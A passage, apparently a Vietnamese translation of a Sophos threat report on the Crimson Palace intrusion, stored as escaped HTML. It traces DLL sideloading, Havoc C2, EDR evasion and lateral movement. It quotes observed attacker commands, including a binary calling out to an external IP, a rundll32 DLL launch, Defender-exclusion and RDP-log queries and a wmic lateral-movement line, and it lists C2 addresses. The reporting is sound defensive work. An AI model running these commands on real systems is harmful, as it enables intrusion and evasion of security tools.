href=\"https:\/\/github.com\/myzxcg\/RealBlindingEDR\">RealBlindingEDR<\/a>&nbsp;<\/td><td>EDR Evasion&nbsp;<\/td><td>Jan.-Mar. 2024&nbsp;<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/florylsk\/ExecIT\">ExecIT<\/a>&nbsp;<\/td><td>Shellcode loader&nbsp;<\/td><td>Mar. 2024&nbsp;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>Th\u00e1ng 10 v\u00e0 th\u00e1ng 11 n\u0103m 2023: S\u1ef1 giao thoa c\u1ee7a c\u00e1c chi\u1ebfn thu\u1eadt&nbsp;<\/strong><\/p>\n\n\n\n<p>Gi\u1ed1ng nh\u01b0 nh\u1eefng quan s\u00e1t tr\u01b0\u1edbc \u0111\u00e2y c\u1ee7a ch\u00fang t\u00f4i, nh\u1eefng k\u1ebb \u0111\u1ee9ng sau l\u00e0n s\u00f3ng ho\u1ea1t \u0111\u1ed9ng m\u1edbi n\u00e0y ch\u1ee7 y\u1ebfu d\u1ef1a v\u00e0o vi\u1ec7c t\u1ea3i DLL, s\u1eed d\u1ee5ng th\u01b0 vi\u1ec7n li\u00ean k\u1ebft \u0111\u1ed9ng \u0111\u1ed9c h\u1ea1i v\u1edbi t\u00ean h\u00e0m tr\u00f9ng kh\u1edbp v\u1edbi t\u00ean h\u00e0m \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng b\u1edfi c\u00e1c t\u1ec7p th\u1ef1c thi h\u1ee3p ph\u00e1p, \u0111\u00e3 k\u00fd v\u00e0 \u0111\u1eb7t ch\u00fang v\u00e0o m\u1ed9t th\u01b0 m\u1ee5c n\u01a1i ch\u00fang s\u1ebd \u0111\u01b0\u1ee3c t\u00ecm th\u1ea5y v\u00e0 t\u1ea3i b\u1edfi c\u00e1c t\u1ec7p th\u1ef1c thi \u0111\u00f3. Ch\u00fang t\u00f4i c\u0169ng th\u1ea5y nh\u1eefng k\u1ebb n\u00e0y s\u1eed d\u1ee5ng c\u00e1c chi\u1ebfn thu\u1eadt m\u00e0 ch\u00fang t\u00f4i \u0111\u00e3 quan s\u00e1t tr\u01b0\u1edbc \u0111\u00e2y nh\u01b0 m\u1ed9t ph\u1ea7n c\u1ee7a c\u00e1c nh\u00f3m ho\u1ea1t \u0111\u1ed9ng \u0111e d\u1ecda kh\u00e1c, c\u1ee7ng c\u1ed1 \u0111\u00e1nh gi\u00e1 c\u1ee7a ch\u00fang t\u00f4i r\u1eb1ng t\u1ea5t c\u1ea3 c\u00e1c ho\u1ea1t \u0111\u1ed9ng tr\u01b0\u1edbc \u0111\u00f3 \u0111\u1ec1u \u0111\u01b0\u1ee3c d\u00e0n d\u1ef1ng b\u1edfi c\u00f9ng m\u1ed9t t\u1ed5 ch\u1ee9c bao qu\u00e1t.&nbsp;<\/p>\n\n\n\n<p>&nbsp;V\u00e0o th\u00e1ng 10, Cluster Charlie \u0111\u00e3 \u0111\u01b0\u1ee3c quan s\u00e1t th\u1ea5y tri\u1ec3n khai th\u00eam c\u00f4ng c\u1ee5 C2 b\u1eb1ng c\u00e1ch s\u1eed d\u1ee5ng DLL hijacking \u0111\u1ec3 l\u1ea1m d\u1ee5ng ph\u1ea7n m\u1ec1m h\u1ee3p ph\u00e1p do ng\u01b0\u1eddi \u0111i\u1ec1u h\u00e0nh t\u1ea3i xu\u1ed1ng \u0111\u1ec3 t\u1ea1o t\u1ec7p th\u1ef1c thi d\u1ec5 b\u1ecb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng. Nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 s\u1eed d\u1ee5ng th\u00f4ng tin x\u00e1c th\u1ef1c thu \u0111\u01b0\u1ee3c t\u1eeb m\u1ed9t thi\u1ebft b\u1ecb kh\u00f4ng \u0111\u01b0\u1ee3c qu\u1ea3n l\u00fd, sau \u0111\u00f3 s\u1eed d\u1ee5ng thi\u1ebft b\u1ecb kh\u00f4ng \u0111\u01b0\u1ee3c qu\u1ea3n l\u00fd \u0111\u00f3 \u0111\u1ec3 kh\u1edfi ch\u1ea1y m\u1ed9t cu\u1ed9c t\u1ea5n c\u00f4ng t\u1eeb xa v\u00e0o m\u1ed9t h\u1ec7 th\u1ed1ng m\u1ee5c ti\u00eau b\u1eb1ng c\u00e1ch s\u1eed d\u1ee5ng m\u00f4-\u0111un Impacket atexec\u2014m\u1ed9t chi\u1ebfn thu\u1eadt \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng nh\u01b0 m\u1ed9t ph\u1ea7n c\u1ee7a ho\u1ea1t \u0111\u1ed9ng Cluster Alpha m\u00e0 ch\u00fang t\u00f4i \u0111\u00e3 quan s\u00e1t th\u1ea5y trong ho\u1ea1t \u0111\u1ed9ng&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#alpha-lateral\">\u0111\u01b0\u1ee3c \u0111\u1ec1 c\u1eadp trong b\u00e1o c\u00e1o tr\u01b0\u1edbc \u0111\u00e2y c\u1ee7a ch\u00fang t\u00f4i<\/a>&nbsp;.&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>M\u00f4-\u0111un atexec \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng \u0111\u1ec3 c\u1ea5u h\u00ecnh t\u1eeb xa m\u1ed9t t\u00e1c v\u1ee5 theo l\u1ecbch tr\u00ecnh tr\u00ean h\u1ec7 th\u1ed1ng m\u1ee5c ti\u00eau. T\u00e1c v\u1ee5 \u0111\u00f3 \u0111\u00e3 th\u1ef1c thi Platinum Watch Dog (ptWatchDog.exe) c\u1ee7a Trend Micro v\u1edbi phi\u00ean b\u1ea3n \u0111\u1ed9c h\u1ea1i \u0111\u01b0\u1ee3c t\u1ea3i ph\u1ee5 c\u1ee7a c\u00f4ng c\u1ee5 DLL tmpblglog.dll; c\u00f4ng c\u1ee5 n\u00e0y \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng \u0111\u1ec3 ping m\u1ed9t \u0111\u1ecba ch\u1ec9 IP do m\u1ed9t c\u00f4ng ty vi\u1ec5n th\u00f4ng trong n\u01b0\u1edbc l\u01b0u tr\u1eef. V\u00ec atexec \u0111\u01b0\u1ee3c ch\u1ea1y t\u1eeb m\u1ed9t thi\u1ebft b\u1ecb kh\u00f4ng \u0111\u01b0\u1ee3c qu\u1ea3n l\u00fd, ch\u00fang t\u00f4i ch\u1ec9 c\u00f3 th\u1ec3 x\u00e1c \u0111\u1ecbnh n\u00f3 b\u1eb1ng ph\u00e9p \u0111o t\u1eeb xa v\u00e0 kh\u00f4ng th\u1ec3 thu th\u1eadp \u0111\u01b0\u1ee3c m\u1eabu n\u00e0o.&nbsp;<\/p>\n\n\n\n<p>&nbsp;M\u1ed9t tu\u1ea7n sau, Sophos quan s\u00e1t th\u1ea5y t\u00e1c nh\u00e2n k\u1ebft n\u1ed1i \u0111\u1ebfn c\u00f9ng m\u1ed9t \u0111\u1ecba ch\u1ec9 IP t\u1ea1i c\u00f4ng ty vi\u1ec5n th\u00f4ng t\u1eeb m\u1ed9t thi\u1ebft b\u1ecb kh\u00e1c tr\u00ean m\u1ea1ng c\u1ee7a n\u1ea1n nh\u00e2n, s\u1eed d\u1ee5ng k\u1ebft h\u1ee3p t\u1ea3i ph\u1ee5 DLL thay th\u1ebf. Trong tr\u01b0\u1eddng h\u1ee3p n\u00e0y, k\u1ebb t\u1ea5n c\u00f4ng tri\u1ec3n khai m\u1ed9t b\u1ea3n sao c\u1ee7a th\u00e0nh ph\u1ea7n Windows .NET framework h\u1ee3p l\u1ec7, mscorsvw.exe, n\u1eb1m trong th\u01b0 m\u1ee5c C:\\Windows\\Help\\Help \u0111\u1ec3 t\u1ea3i ph\u1ee5 t\u1ea3i \u0111\u1ed9c h\u1ea1i (mscorsvc.dll) v\u00e0 t\u1ea1o k\u1ebft n\u1ed1i m\u1ea1ng \u0111\u1ebfn c\u00f9ng m\u1ed9t c\u00f4ng ty vi\u1ec5n th\u00f4ng tr\u00ean c\u1ed5ng TCP 443.&nbsp;&nbsp;<\/p>\n\n\n\n<p>Trong c\u00e1c k\u1ebft n\u1ed1i m\u1ea1ng n\u00e0y, Sophos \u0111\u00e3 quan s\u00e1t th\u1ea5y vi\u1ec7c t\u1ea1o ra m\u1ed9t kh\u00f3a x\u00e1c th\u1ef1c m\u00e1y m\u1edbi. \u0110i\u1ec1u n\u00e0y cho th\u1ea5y r\u1eb1ng t\u00e1c nh\u00e2n \u0111e d\u1ecda \u0111\u00e3 c\u1ed1 g\u1eafng RDP t\u1eeb m\u1ed9t thi\u1ebft b\u1ecb b\u00ean ngo\u00e0i m\u00f4i tr\u01b0\u1eddng c\u1ee7a t\u1ed5 ch\u1ee9c m\u1ee5c ti\u00eau. Vi\u1ec7c \u0111i\u1ec1u tra IP t\u1eeb xa th\u00f4ng qua c\u00f4ng c\u1ee5 t\u00ecm ki\u1ebfm l\u1ed7 h\u1ed5ng&nbsp;<a href=\"https:\/\/www.shodan.io\/dashboard\">Shodan<\/a>&nbsp;\u0111\u00e3 t\u00ecm th\u1ea5y m\u1ed9t m\u00e0n h\u00ecnh x\u00e1c th\u1ef1c ng\u01b0\u1eddi d\u00f9ng m\u00e1y ch\u1ee7 RDP m\u1edf tr\u00ean thi\u1ebft b\u1ecb t\u1eeb xa \u0111\u00f3. Nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng li\u00ean t\u1ee5c s\u1eed d\u1ee5ng c\u00e1c m\u1ea1ng b\u1ecb x\u00e2m ph\u1ea1m kh\u00e1c trong khu v\u1ef1c c\u1ee7a t\u1ed5 ch\u1ee9c \u0111\u1ec3 di chuy\u1ec3n ngang trong m\u1ea1ng.&nbsp;&nbsp;<\/p>\n\n\n\n<p>V\u00e0o ng\u00e0y 3 th\u00e1ng 11, Sophos MDR m\u1ed9t l\u1ea7n n\u1eefa quan s\u00e1t th\u1ea5y c\u00e1c t\u00e1c nh\u00e2n s\u1eed d\u1ee5ng atexec t\u1eeb m\u1ed9t thi\u1ebft b\u1ecb kh\u00f4ng \u0111\u01b0\u1ee3c qu\u1ea3n l\u00fd tr\u00ean m\u1ea1ng \u0111\u1ec3 th\u1ef1c thi t\u1ec7p \u0111\u1ed9c h\u1ea1i (C:\\ProgramData\\mios.exe) tr\u00ean m\u1ed9t h\u1ec7 th\u1ed1ng m\u1ee5c ti\u00eau \u0111\u1ec3 t\u1ea1o ra c\u00e1c th\u00f4ng tin li\u00ean l\u1ea1c n\u1ed9i b\u1ed9 v\u00e0 b\u00ean ngo\u00e0i:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Truy\u1ec1n th\u00f4ng n\u1ed9i b\u1ed9: C:\\Windows\\system32\\cmd.exe \/C \u201cc:\\programdata\\mios.exe 172.xx.xxx.xx 65211\u201d&nbsp;<\/li>\n\n\n\n<li>Truy\u1ec1n th\u00f4ng b\u00ean ngo\u00e0i: c:\\programdata\\mios.exe 178.128.221.202 443 (Digital Ocean, Singapore)&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Sophos kh\u00f4ng th\u1ec3 l\u1ea5y \u0111\u01b0\u1ee3c m\u1eabu c\u1ee7a t\u1ec7p th\u1ef1c thi \u0111\u1ed9c h\u1ea1i n\u00e0y.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/aws.vacif.com\/wp-content\/uploads\/sites\/3\/2024\/09\/crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi-3-1024x857.png\" alt=\"\" class=\"wp-image-20414\"\/><figcaption class=\"wp-element-caption\"><em>H\u00ecnh 3: B\u1ea3n \u0111\u1ed3 lu\u1ed3ng chu\u1ed7i t\u1ea5n c\u00f4ng \u0111\u01b0\u1ee3c k\u1ebb t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng trong giai \u0111o\u1ea1n x\u00e2m nh\u1eadp th\u1ee9 hai (nh\u1ea5p \u0111\u1ec3 ph\u00f3ng to)<\/em><\/figcaption><\/figure>\n\n\n\n<p><strong>Th\u00e1ng 11 v\u00e0 th\u00e1ng 12 n\u0103m 2023, ph\u1ea7n 1: Chi\u1ebfm \u0111o\u1ea1t d\u1ecbch v\u1ee5&nbsp;<\/strong><\/p>\n\n\n\n<p>C\u0169ng trong th\u00e1ng 11, ch\u00fang t\u00f4i \u0111\u00e3 quan s\u00e1t th\u1ea5y t\u00e1c nh\u00e2n \u0111e d\u1ecda t\u00ecm ki\u1ebfm nhi\u1ec1u d\u1ecbch v\u1ee5 m\u00e0 ch\u00fang c\u00f3 th\u1ec3 khai th\u00e1c \u0111\u1ec3 t\u1ea3i DLL, sau \u0111\u00f3 l\u00e0 chi\u1ebfm \u0111o\u1ea1t DLL c\u1ee7a c\u00e1c d\u1ecbch v\u1ee5 hi\u1ec7n c\u00f3 \u0111\u1ec3 thi\u1ebft l\u1eadp m\u1ed9t c\u1eeda h\u1eadu t\u00f9y ch\u1ec9nh. B\u01b0\u1edbc \u0111\u1ea7u ti\u00ean c\u1ee7a ch\u00fang l\u00e0 s\u1eed d\u1ee5ng ti\u1ec7n \u00edch Service Control c\u1ee7a Microsoft (sc.exe)&nbsp;\u0111\u1ec3 thu th\u1eadp th\u00f4ng tin v\u1ec1 c\u00e1c d\u1ecbch v\u1ee5 m\u00e0 ch\u00fang c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng \u0111\u1ec3 l\u01b0u tr\u1eef DLL \u0111\u1ed9c h\u1ea1i:&nbsp;<\/p>\n\n\n\n<p>sc query diagtrack&nbsp;&nbsp;<\/p>\n\n\n\n<p>sc query appmgmt&nbsp;&nbsp;<\/p>\n\n\n\n<p>sc query AxInstSV&nbsp;&nbsp;<\/p>\n\n\n\n<p>sc query swprv&nbsp;<\/p>\n\n\n\n<p>Trong tr\u01b0\u1eddng h\u1ee3p n\u00e0y, sau \u0111\u00f3, t\u00e1c nh\u00e2n \u0111\u00e3 thay th\u1ebf DLL Volume Shadow Copy Service h\u1ee3p l\u1ec7 (C:\\System32\\swprv.dll) b\u1eb1ng payload \u0111\u1ed9c h\u1ea1i c\u1ee7a ri\u00eang ch\u00fang, l\u00e0m lu m\u1edd th\u00eam qu\u00e1 tr\u00ecnh tri\u1ec3n khai c\u1ee7a ch\u00fang. Ch\u00fang \u0111\u00e3 l\u00e0m \u0111i\u1ec1u n\u00e0y b\u1eb1ng c\u00e1ch s\u1eed d\u1ee5ng m\u1ed9t t\u00e0i kho\u1ea3n qu\u1ea3n tr\u1ecb b\u1ecb x\u00e2m ph\u1ea1m \u0111\u1ec3 s\u1eeda \u0111\u1ed5i c\u00e1c quy\u1ec1n tr\u00ean DLL hi\u1ec7n c\u00f3 t\u1eeb File Explorer, tr\u01b0\u1edbc khi di chuy\u1ec3n b\u1ea3n sao (\u0111\u1ed9c h\u1ea1i) c\u1ee7a ri\u00eang ch\u00fang v\u00e0o th\u01b0 m\u1ee5c \\System32.&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>Sophos MDR \u0111\u00e3\u202f&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#prior-compromise\">quan s\u00e1t th\u1ea5y ho\u1ea1t \u0111\u1ed9ng t\u01b0\u01a1ng t\u1ef1 v\u00e0o th\u00e1ng 12 n\u0103m 2022<\/a>&nbsp;trong m\u1ed9t v\u1ee5 x\u00e2m ph\u1ea1m tr\u01b0\u1edbc \u0111\u00f3 c\u1ee7a c\u01a1 quan n\u00e0y \u0111\u01b0\u1ee3c ph\u00e1t hi\u1ec7n khi b\u1ea3o v\u1ec7 \u0111i\u1ec3m cu\u1ed1i Sophos ban \u0111\u1ea7u \u0111\u01b0\u1ee3c tri\u1ec3n khai tr\u00ean m\u1ea1ng c\u1ee7a c\u01a1 quan n\u00e0y. C\u00e1c hi\u1ec7n v\u1eadt c\u1ee7a ho\u1ea1t \u0111\u1ed9ng \u0111\u00f3 cho th\u1ea5y k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 t\u1eadn d\u1ee5ng kh\u00e2u DLL \u0111\u1ec3 t\u1ea1o ra hai DLL l\u1edbn (swprvs.dll v\u00e0 appmgmt.dll).&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>Khi th\u1ef1c hi\u1ec7n D\u1ecbch v\u1ee5 sao ch\u00e9p b\u00f3ng t\u1eeb svchost.exe, swprv.dll \u0111\u1ed9c h\u1ea1i \u0111\u01b0\u1ee3c ph\u00e1t hi\u1ec7n th\u1ef1c hi\u1ec7n nhi\u1ec1u y\u00eau c\u1ea7u DNS v\u00e0 k\u1ebft n\u1ed1i m\u1ea1ng t\u1edbi c\u00e1c mi\u1ec1n v\u00e0 \u0111\u1ecba ch\u1ec9 IP sau:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>103.19.16.248:443 \/\/ dmsz.org (n\u1eb1m \u1edf Philippines)&nbsp;<\/li>\n\n\n\n<li>103.56.5.224:443 \/\/ cancelle.net (c\u00f3 v\u1ecb tr\u00ed \u0111\u1ecba l\u00fd t\u1ea1i Philippines)&nbsp;<\/li>\n\n\n\n<li>49.157.28.114:443 \/\/ gandeste.net (n\u1eb1m \u1edf Philippines)&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>V\u00e0o th\u00e1ng 12, c\u00e1c t\u00e1c nh\u00e2n \u0111\u00e3 s\u1eed d\u1ee5ng k\u1ef9 thu\u1eadt sideloading n\u00e0y \u0111\u1ec3 ch\u1ea1y ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i giao ti\u1ebfp v\u1edbi \u0111\u1ecba ch\u1ec9 IP 123.253.35.100 (\u0111\u01b0\u1ee3c \u0111\u1ecbnh v\u1ecb \u0111\u1ecba l\u00fd t\u1ea1i Malaysia), th\u00f4ng qua quy tr\u00ecnh tr\u00ecnh duy\u1ec7t Internet Explorer iexplore.exe. Theo ph\u00e2n t\u00edch t\u1eeb SophosLabs, DLL \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf \u0111\u1ec3 thay \u0111\u1ed5i c\u00e0i \u0111\u1eb7t proxy t\u01b0\u1eddng l\u1eeda v\u00e0 \u0111\u01b0\u1ee3c quan s\u00e1t th\u1ea5y \u0111ang t\u1ea1o m\u1ed9t shell l\u1ec7nh \u0111\u1ec3 ho\u00e0n t\u1ea5t qu\u00e1 tr\u00ecnh kh\u00e1m ph\u00e1. DLL ch\u1ee9a m\u1ed9t chu\u1ed7i \u0111\u00e1ng ng\u1edd d\u01b0\u1eddng nh\u01b0 ti\u1ebft l\u1ed9 \u0111\u01b0\u1eddng d\u1eabn t\u1ec7p tr\u00ean m\u00e1y t\u00ednh ph\u00e1t tri\u1ec3n c\u1ee7a ng\u01b0\u1eddi t\u1ea1o ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i (E:\\Masol_https190228\\x64\\Release\\Masol.pdb).&nbsp;<\/p>\n\n\n\n<p>Trong m\u1ed9t v\u00ed d\u1ee5 v\u1ec1 c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng t\u01b0\u01a1ng t\u1ef1 nh\u01b0ng kh\u00e1c bi\u1ec7t, trong khi c\u1ea3 Cluster Charlie v\u00e0 Cluster Alpha&nbsp;\u0111\u1ec1u ch\u1ecdn tri\u1ec3n khai m\u1ed9t s\u1ed1 ph\u1ea7n t\u1ea3i tr\u1ecdng c\u1ee7a ch\u00fang b\u1eb1ng c\u00e1ch s\u1eed d\u1ee5ng t\u1ea3i ph\u1ee5 Service DLL, d\u1ecbch v\u1ee5 m\u00e0 Cluster Charlie nh\u1eafm t\u1edbi, th\u00ec Volume Shadow Copy Service \u0111\u00e3 s\u1eed d\u1ee5ng c\u00e1c quy\u1ec1n g\u1ed1c m\u00e0 Cluster Alpha \u0111\u00e3 th\u00eam v\u00e0o d\u1ecbch v\u1ee5 IKEEXT (IKE v\u00e0 AuthIP IPsec Keying Modules) v\u00e0o th\u00e1ng 6 n\u0103m 2023, nh\u01b0 \u0111\u00e3 m\u00f4 t\u1ea3 trong&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#alpha-persistence\">Ph\u1ea7n 1 Ph\u00e2n t\u00edch chuy\u00ean s\u00e2u v\u1ec1 k\u1ef9 thu\u1eadt<\/a>&nbsp;c\u1ee7a ch\u00fang t\u00f4i .&nbsp;<\/p>\n\n\n\n<p><strong>Th\u00e1ng 11 v\u00e0 th\u00e1ng 12 n\u0103m 2023, ph\u1ea7n 2: H\u00e0nh \u0111\u1ed9ng n\u00e9 tr\u00e1nh, tr\u1ed1n tr\u00e1nh EDR v\u00e0 \u200b\u200btrinh s\u00e1t s\u00e2u h\u01a1n&nbsp;<\/strong><\/p>\n\n\n\n<p>V\u00e0o gi\u1eefa th\u00e1ng 11, c\u00f9ng m\u1ed9t m\u00e1y ch\u1ee7 \u1ee9ng d\u1ee5ng web \u0111\u00e3 b\u1ecb t\u1ea5n c\u00f4ng v\u00e0o th\u00e1ng 9 \u0111\u00e3 b\u1ecb x\u00e2m ph\u1ea1m m\u1ed9t l\u1ea7n n\u1eefa, v\u1edbi t\u00e1c nh\u00e2n \u0111e d\u1ecda s\u1eed d\u1ee5ng th\u00f4ng tin \u0111\u0103ng nh\u1eadp b\u1ecb \u0111\u00e1nh c\u1eafp t\u1eeb m\u1ed9t thi\u1ebft b\u1ecb kh\u00f4ng \u0111\u01b0\u1ee3c qu\u1ea3n l\u00fd v\u00e0 m\u1ed9t web shell b\u1ecb x\u00f3a. Nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 s\u1eed d\u1ee5ng shell \u0111\u1ec3 th\u1ef1c thi rundll32.exe, \u0111\u01b0a m\u1ed9t Havoc DLL \u0111\u1ed9c h\u1ea1i (v\u1edbi ph\u1ea7n m\u1edf r\u1ed9ng t\u1ec7p \u0111\u01b0\u1ee3c \u0111\u1ed5i th\u00e0nh .pdf) v\u00e0o backgroundtaskhost.exe, m\u1ed9t th\u00e0nh ph\u1ea7n Windows ch\u1ecbu tr\u00e1ch nhi\u1ec7m th\u1ef1c thi tr\u1ee3 l\u00fd \u1ea3o Windows (Cortana):&nbsp;<\/p>\n\n\n\n<p>rundll32 C:\\inetpub\\wwwroot\\idocs_api\\Temp\\&lt;REDACTED&gt;DOC20231100001603KMAP.pdf,Start&nbsp;<\/p>\n\n\n\n<p>DLL n\u00e0y \u0111\u00e3 g\u1eedi&nbsp;th\u00f4ng tin li\u00ean l\u1ea1c C2 \u0111\u1ebfn m\u00e1y ch\u1ee7 C2 c\u1ee7a k\u1ebb t\u1ea5n c\u00f4ng (107.148.41.114, c\u00f3 v\u1ecb tr\u00ed \u0111\u1ecba l\u00fd t\u1ea1i Hoa K\u1ef3).&nbsp;<\/p>\n\n\n\n<p>Ti\u1ebfp theo, k\u1ebb t\u1ea5n c\u00f4ng ch\u1ea1y l\u1ec7nh sau \u0111\u1ec3 ki\u1ec3m tra xem \u0111\u0103ng nh\u1eadp RDP c\u00f3 th\u00e0nh c\u00f4ng kh\u00f4ng. K\u1ebb t\u1ea5n c\u00f4ng \u0111ang t\u00ecm ki\u1ebfm Windows Event Logs cho Windows Remote Connection Manager event ID 1149:&nbsp;<\/p>\n\n\n\n<p>\/c wevtutil qe Microsoft-Windows-TerminalServices-RemoteConnectionManager\/Operational \/rd:true \/f:text \/q:*[System[(EventID=1149)]] &gt;&gt; c:\\windows\\temp\\1.txt&nbsp;<\/p>\n\n\n\n<p>Truy v\u1ea5n n\u00e0y s\u1ebd tr\u1ea3 v\u1ec1 c\u00e1c s\u1ef1 ki\u1ec7n Windows b\u00e1o hi\u1ec7u vi\u1ec7c thi\u1ebft l\u1eadp th\u00e0nh c\u00f4ng phi\u00ean k\u1ebft n\u1ed1i t\u1eeb xa c\u1ee7a Terminal Services. Sau \u0111\u00f3, Havoc DLL \u0111\u00e3 g\u1eedi l\u1ec7nh ping tr\u1edf l\u1ea1i C2 c\u1ee7a n\u00f3.&nbsp;<\/p>\n\n\n\n<p>Ti\u1ebfp theo, quy tr\u00ecnh \u0111\u01b0\u1ee3c ti\u00eam s\u1eed d\u1ee5ng WMIC \u0111\u1ec3 truy v\u1ea5n \u0111\u01b0\u1eddng d\u1eabn lo\u1ea1i tr\u1eeb c\u1ee7a Windows Defender, \u0111i\u1ec1u n\u00e0y s\u1ebd cung c\u1ea5p cho ch\u00fang th\u00f4ng tin v\u1ec1 nh\u1eefng th\u01b0 m\u1ee5c v\u00e0 lo\u1ea1i t\u1ec7p n\u00e0o kh\u00f4ng \u0111\u01b0\u1ee3c Defender qu\u00e9t\u2014v\u1ec1 m\u1eb7t l\u00fd thuy\u1ebft, nh\u1eefng v\u1ecb tr\u00ed c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng \u0111\u1ec3 tr\u00e1nh b\u1ea3o v\u1ec7 kh\u1ecfi ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i.&nbsp;<\/p>\n\n\n\n<p>\/c WMIC \/NAMESPACE:\\\\root\\Microsoft\\Windows\\Defender PATH MSFT_MpPreference get ExclusionPath<\/p>\n\n\n\n<p>N\u00f3 c\u0169ng truy v\u1ea5n s\u1ed5 \u0111\u0103ng k\u00fd Sophos \u0111\u1ec3 hi\u1ec3u r\u00f5 h\u01a1n c\u00e1c gi\u00e1 tr\u1ecb c\u1ee7a S\u1ed5 \u0111\u0103ng k\u00fd \u201cPolicyConfiguration\u201d, \u201cthreat policy\u201d v\u00e0 \u201cPoll Server\u201d, c\u0169ng nh\u01b0 s\u1eed d\u1ee5ng cmd.exe \u0111\u1ec3 truy v\u1ea5n tr\u1ea1ng th\u00e1i \u201cSophosHealthClient.exe\u201d. \u0110i\u1ec1u n\u00e0y ti\u1ebft l\u1ed9 c\u1ea5u h\u00ecnh ch\u00ednh s\u00e1ch b\u1ea3o m\u1eadt cho \u0111i\u1ec3m cu\u1ed1i, tr\u1ea1ng th\u00e1i b\u1ea3o v\u1ec7 Sophos tr\u00ean thi\u1ebft b\u1ecb v\u00e0 URL m\u00e0 ph\u1ea7n m\u1ec1m b\u1ea3o v\u1ec7 \u0111i\u1ec3m cu\u1ed1i th\u0103m d\u00f2 \u0111\u1ec3 thay \u0111\u1ed5i c\u00e0i \u0111\u1eb7t c\u1ea5u h\u00ecnh. Khi k\u1ebft th\u00fac truy v\u1ea5n, t\u00e1c nh\u00e2n \u0111e d\u1ecda \u0111\u00e3 s\u1eed d\u1ee5ng l\u1ec7nh sau \u0111\u1ec3 x\u00e1c \u0111\u1ecbnh c\u00e1c lo\u1ea1i tr\u1eeb, m\u1ee5c \u0111\u01b0\u1ee3c ph\u00e9p v\u00e0 m\u1ee5c b\u1ecb ch\u1eb7n trong c\u1ea5u h\u00ecnh:&nbsp;<\/p>\n\n\n\n<p>findstr \/i \/c:exclude \/c:whitelist \/c:blocklist&nbsp;<\/p>\n\n\n\n<p>D\u1eef li\u1ec7u m\u00e1y ch\u1ee7 th\u0103m d\u00f2 c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i nh\u01b0&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#alpha-persistence\">EagerBee<\/a>&nbsp;(nh\u01b0 \u0111\u00e3 th\u1ea5y trong&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#cluster-alpha\">ho\u1ea1t \u0111\u1ed9ng Cluster Alpha \u0111\u01b0\u1ee3c ghi l\u1ea1i trong b\u00e1o c\u00e1o g\u1ea7n \u0111\u00e2y nh\u1ea5t c\u1ee7a ch\u00fang t\u00f4i<\/a>&nbsp;) s\u1eed d\u1ee5ng \u0111\u1ec3 ch\u1eb7n d\u1eef li\u1ec7u \u0111o t\u1eeb xa v\u00e0 c\u1eadp nh\u1eadt cho \u0111i\u1ec3m cu\u1ed1i trong t\u01b0\u01a1ng lai, m\u1eb7c d\u00f9 kh\u00f4ng c\u00f3 b\u1eb1ng ch\u1ee9ng n\u00e0o cho th\u1ea5y \u0111i\u1ec1u \u0111\u00f3 x\u1ea3y ra \u1edf \u0111\u00e2y.&nbsp;<\/p>\n\n\n\n<p>C\u0169ng trong th\u00e1ng 11, b\u1eb1ng c\u00e1ch s\u1eed d\u1ee5ng m\u1ed9t t\u00e0i kho\u1ea3n qu\u1ea3n tr\u1ecb b\u1ecb x\u00e2m ph\u1ea1m, nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 s\u1eed d\u1ee5ng phi\u00ean shell l\u1ec7nh \u0111\u01b0\u1ee3c t\u1ea1o ra t\u1eeb DLL \u0111\u1ed9c h\u1ea1i \u0111\u1ec3 di chuy\u1ec3n ngang qua WMIC v\u00e0 tri\u1ec3n khai c\u00f4ng c\u1ee5 SharpHound ngu\u1ed3n m\u1edf d\u01b0\u1edbi d\u1ea1ng DLL \u0111\u1ec3 l\u1eadp b\u1ea3n \u0111\u1ed3 c\u01a1 s\u1edf h\u1ea1 t\u1ea7ng Active Directory.&nbsp;&nbsp;<\/p>\n\n\n\n<p>\/c wmic \/node:172.xx.xxx.xxx\/password:&#8221;&lt;REDACTED&gt;&#8221; 